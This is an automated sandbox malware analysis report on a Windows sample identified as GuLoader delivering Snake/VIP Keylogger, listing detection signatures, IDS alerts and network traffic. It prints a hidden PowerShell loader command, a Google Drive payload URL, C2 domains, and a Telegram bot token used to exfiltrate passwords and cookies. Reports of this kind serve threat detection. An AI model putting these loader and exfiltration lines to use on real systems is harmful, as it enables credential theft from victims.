Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Technonomic.exe

Overview

General Information

Sample name:Technonomic.exe
Analysis ID:1580360
MD5:c174a412be6f74c3323ae8d6d4737086
SHA1:c703daa5df8c281206a8d85b582b8a1b729748f5
SHA256:bb71b94948e6929047bde8df94c187fbb6f2cc0119a0c386f84b9ea144aabd67
Tags:exeuser-abuse_ch
Infos:

Detection

GuLoader, Snake Keylogger, VIP Keylogger
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Early bird code injection technique detected
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected GuLoader
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
AI detected suspicious sample
Found suspicious powershell code related to unpacking or dynamic code loading
Hides threads from debuggers
Loading BitLocker PowerShell Module
Powershell drops PE file
Queues an APC in another process (thread injection)
Suspicious powershell command line found
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Msiexec Initiated Connection
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer

Classification

  • System is w10x64
  • Technonomic.exe (PID: 7472 cmdline: "C:\Users\user\Desktop\Technonomic.exe" MD5: C174A412BE6F74C3323AE8D6D4737086)
    • powershell.exe (PID: 7576 cmdline: powershell.exe -windowstyle hidden "$Spookological=gc -raw 'C:\Users\user\AppData\Local\magmaet\clenched\Ifrt.Syd';$Transporterede=$Spookological.SubString(26028,3);.$Transporterede($Spookological) " MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7584 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • msiexec.exe (PID: 7192 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger
{"C2 url": "https://api.telegram.org/bot8179583980:AAG4cdQWaAviOBBhSs3OrT1OX6_IUptNQv8/sendMessage"}
{"Exfil Mode": "Telegram", "Token": "8179583980:AAG4cdQWaAviOBBhSs3OrT1OX6_IUptNQv8", "Chat_id": "6070006284", "Version": "4.4"}
SourceRuleDescriptionAuthorStrings
00000007.00000002.2620412422.00000000258F5000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    00000007.00000002.2620412422.0000000025927000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
      00000007.00000002.2620412422.0000000025927000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
        00000007.00000002.2620412422.00000000257F1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
          00000007.00000002.2598654434.000000000651E000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
            Click to see the 2 entries

            System Summary

            barindex
            Source: Network ConnectionAuthor: frack113: Data: DesusertionIp: 172.217.19.238, DesusertionIsIpv6: false, DesusertionPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 7192, Protocol: tcp, SourceIp: 192.168.2.9, SourceIsIpv6: false, SourcePort: 49859
            Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7576, TargetFilename: C:\Users\user\AppData\Local\magmaet\clenched\Nonadoptable\Technonomic.exe
            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell.exe -windowstyle hidden "$Spookological=gc -raw 'C:\Users\user\AppData\Local\magmaet\clenched\Ifrt.Syd';$Transporterede=$Spookological.SubString(26028,3);.$Transporterede($Spookological) ", CommandLine: powershell.exe -windowstyle hidden "$Spookological=gc -raw 'C:\Users\user\AppData\Local\magmaet\clenched\Ifrt.Syd';$Transporterede=$Spookological.SubString(26028,3);.$Transporterede($Spookological) ", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Technonomic.exe", ParentImage: C:\Users\user\Desktop\Technonomic.exe, ParentProcessId: 7472, ParentProcessName: Technonomic.exe, ProcessCommandLine: powershell.exe -windowstyle hidden "$Spookological=gc -raw 'C:\Users\user\AppData\Local\magmaet\clenched\Ifrt.Syd';$Transporterede=$Spookological.SubString(26028,3);.$Transporterede($Spookological) ", ProcessId: 7576, ProcessName: powershell.exe
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-12-24T11:28:31.203039+010028033053Unknown Traffic192.168.2.949893172.67.177.134443TCP
            2024-12-24T11:28:43.419540+010028033053Unknown Traffic192.168.2.949930172.67.177.134443TCP
            2024-12-24T11:28:46.508208+010028033053Unknown Traffic192.168.2.949938172.67.177.134443TCP
            2024-12-24T11:28:49.552413+010028033053Unknown Traffic192.168.2.949947172.67.177.134443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-12-24T11:28:27.076023+010028032742Potentially Bad Traffic192.168.2.949881193.122.6.16880TCP
            2024-12-24T11:28:29.591650+010028032742Potentially Bad Traffic192.168.2.949881193.122.6.16880TCP
            2024-12-24T11:28:32.638538+010028032742Potentially Bad Traffic192.168.2.949898193.122.6.16880TCP
            2024-12-24T11:28:35.701053+010028032742Potentially Bad Traffic192.168.2.949907193.122.6.16880TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-12-24T11:28:19.193344+010028032702Potentially Bad Traffic192.168.2.949859172.217.19.238443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-12-24T11:29:01.923440+010018100081Potentially Bad Traffic192.168.2.949980149.154.167.220443TCP
            2024-12-24T11:29:05.422716+010018100081Potentially Bad Traffic192.168.2.949990149.154.167.220443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-12-24T11:28:54.646489+010018100071Potentially Bad Traffic192.168.2.949962149.154.167.220443TCP

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: 00000007.00000002.2620412422.00000000257F1000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "Telegram", "Token": "8179583980:AAG4cdQWaAviOBBhSs3OrT1OX6_IUptNQv8", "Chat_id": "6070006284", "Version": "4.4"}
            Source: msiexec.exe.7192.7.memstrminMalware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot8179583980:AAG4cdQWaAviOBBhSs3OrT1OX6_IUptNQv8/sendMessage"}
            Source: C:\Users\user\AppData\Local\magmaet\clenched\Nonadoptable\Technonomic.exeReversingLabs: Detection: 44%
            Source: Technonomic.exeReversingLabs: Detection: 44%
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 98.1% probability

            Location Tracking

            barindex
            Source: unknownDNS query: name: reallyfreegeoip.org
            Source: Technonomic.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: unknownHTTPS traffic detected: 172.67.177.134:443 -> 192.168.2.9:49887 version: TLS 1.0
            Source: unknownHTTPS traffic detected: 172.217.19.238:443 -> 192.168.2.9:49859 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.250.181.1:443 -> 192.168.2.9:49866 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.9:49962 version: TLS 1.2
            Source: Technonomic.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: C:\Users\user\Desktop\Technonomic.exeCode function: 0_2_00405974 CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405974
            Source: C:\Users\user\Desktop\Technonomic.exeCode function: 0_2_004064C6 FindFirstFileW,FindClose,0_2_004064C6
            Source: C:\Users\user\Desktop\Technonomic.exeCode function: 0_2_004027FB FindFirstFileW,0_2_004027FB
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 032AF45Dh7_2_032AF130
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 032AF45Dh7_2_032AF4AC
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 032AFC19h7_2_032AF961

            Networking

            barindex
            Source: Network trafficSuricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.9:49962 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.9:49980 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.9:49990 -> 149.154.167.220:443
            Source: unknownDNS query: name: api.telegram.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:114127%0D%0ADate%20and%20Time:%2025/12/2024%20/%2010:58:46%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20114127%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot8179583980:AAG4cdQWaAviOBBhSs3OrT1OX6_IUptNQv8/sendDocument?chat_id=6070006284&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd2558e4eafe83Host: api.telegram.orgContent-Length: 580
            Source: global trafficHTTP traffic detected: POST /bot8179583980:AAG4cdQWaAviOBBhSs3OrT1OX6_IUptNQv8/sendDocument?chat_id=6070006284&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0ACookies%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd2581d8da2c05Host: api.telegram.orgContent-Length: 1277Connection: Keep-Alive
            Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
            Source: Joe Sandbox ViewIP Address: 193.122.6.168 193.122.6.168
            Source: Joe Sandbox ViewIP Address: 172.67.177.134 172.67.177.134
            Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
            Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
            Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
            Source: unknownDNS query: name: checkip.dyndns.org
            Source: unknownDNS query: name: reallyfreegeoip.org
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.9:49907 -> 193.122.6.168:80
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.9:49898 -> 193.122.6.168:80
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.9:49881 -> 193.122.6.168:80
            Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:49859 -> 172.217.19.238:443
            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49938 -> 172.67.177.134:443
            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49893 -> 172.67.177.134:443
            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49930 -> 172.67.177.134:443
            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49947 -> 172.67.177.134:443
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1s9TL-F4ttEqHxCwa9i4eX3qIKAGwYH6B HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /download?id=1s9TL-F4ttEqHxCwa9i4eX3qIKAGwYH6B&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: unknownHTTPS traffic detected: 172.67.177.134:443 -> 192.168.2.9:49887 version: TLS 1.0
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1s9TL-F4ttEqHxCwa9i4eX3qIKAGwYH6B HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /download?id=1s9TL-F4ttEqHxCwa9i4eX3qIKAGwYH6B&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:114127%0D%0ADate%20and%20Time:%2025/12/2024%20/%2010:58:46%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20114127%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficDNS traffic detected: DNS query: drive.google.com
            Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
            Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
            Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
            Source: global trafficDNS traffic detected: DNS query: api.telegram.org
            Source: unknownHTTP traffic detected: POST /bot8179583980:AAG4cdQWaAviOBBhSs3OrT1OX6_IUptNQv8/sendDocument?chat_id=6070006284&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd2558e4eafe83Host: api.telegram.orgContent-Length: 580
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Tue, 24 Dec 2024 10:28:54 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
            Source: msiexec.exe, 00000007.00000002.2620412422.0000000025927000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?L
            Source: msiexec.exe, 00000007.00000002.2620412422.00000000257F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://aborters.duckdns.org:8081
            Source: msiexec.exe, 00000007.00000002.2620412422.00000000257F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anotherarmy.dns.army:8081
            Source: msiexec.exe, 00000007.00000002.2620412422.0000000025939000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
            Source: msiexec.exe, 00000007.00000002.2620412422.00000000257F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
            Source: msiexec.exe, 00000007.00000002.2620412422.00000000257F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
            Source: Technonomic.exe, Technonomic.exe.2.drString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
            Source: msiexec.exe, 00000007.00000002.2620412422.00000000257F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: msiexec.exe, 00000007.00000002.2620412422.00000000257F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://varders.kozow.com:8081
            Source: msiexec.exe, 00000007.00000002.2621544953.0000000026811000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: msiexec.exe, 00000007.00000002.2620412422.0000000025939000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2620412422.0000000025927000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2620412422.00000000258D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
            Source: msiexec.exe, 00000007.00000002.2620412422.0000000025927000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2620412422.00000000258D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
            Source: msiexec.exe, 00000007.00000002.2620412422.00000000258D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
            Source: msiexec.exe, 00000007.00000002.2620412422.00000000258D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:114127%0D%0ADate%20a
            Source: msiexec.exe, 00000007.00000002.2620412422.0000000025927000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot8179583980:AAG4cdQWaAviOBBhSs3OrT1OX6_IUptNQv8/sendDocument?chat_id=6070
            Source: msiexec.exe, 00000007.00000003.2084389047.0000000009F2E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2140997923.0000000009F6C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2084389047.0000000009F6D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2084498590.0000000009F6D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
            Source: msiexec.exe, 00000007.00000002.2621544953.0000000026811000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: msiexec.exe, 00000007.00000002.2621544953.0000000026811000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: msiexec.exe, 00000007.00000002.2621544953.0000000026811000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: msiexec.exe, 00000007.00000002.2620412422.00000000259AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en
            Source: msiexec.exe, 00000007.00000002.2620412422.00000000259A7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=enlB
            Source: msiexec.exe, 00000007.00000002.2606714921.0000000009EEE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/
            Source: msiexec.exe, 00000007.00000002.2606694984.0000000009E50000.00000004.00001000.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2606714921.0000000009EAA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1s9TL-F4ttEqHxCwa9i4eX3qIKAGwYH6B
            Source: msiexec.exe, 00000007.00000002.2606714921.0000000009EAA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1s9TL-F4ttEqHxCwa9i4eX3qIKAGwYH6Bs
            Source: msiexec.exe, 00000007.00000003.2141034784.0000000009F2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/
